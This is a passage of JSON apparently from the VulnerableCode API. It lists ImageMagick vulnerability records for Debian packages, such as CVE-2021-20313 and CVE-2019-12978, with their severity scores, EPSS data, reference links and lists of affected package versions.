"VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-16708" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ytpg-f9mm-sbev" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80564?format=api", "vulnerability_id": "VCID-yub2-x8z7-d3e6", "summary": "ImageMagick: Cipher leak when the calculating signatures in TransformSignatureof MagickCore/signature.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20313.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20313.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20313", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47384", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47417", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47438", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47388", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47443", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.4744", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47463", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47444", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47504", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47496", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47448", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47435", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20313" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20313", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20313" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1947019", "reference_id": "1947019", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1947019" }, { "reference_url": "https://usn.ubuntu.com/5158-1/", "reference_id": "USN-5158-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5158-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20313" ], "risk_score": 2.3, "exploitability": "0.5", "weighted_severity": "4.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yub2-x8z7-d3e6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82460?format=api", "vulnerability_id": "VCID-zdu5-rtg2-pffb", "summary": "imagemagick: use of uninitialized value in function ReadPANGOImage in coders/pango.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12978.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12978.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.34804", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.35119", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.35086", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.35061", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.35097", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.35083", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00147", "scoring_system": "epss", "scoring_elements": "0.35037", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35588", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35541", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35562", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35363", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.3547", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35516", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", 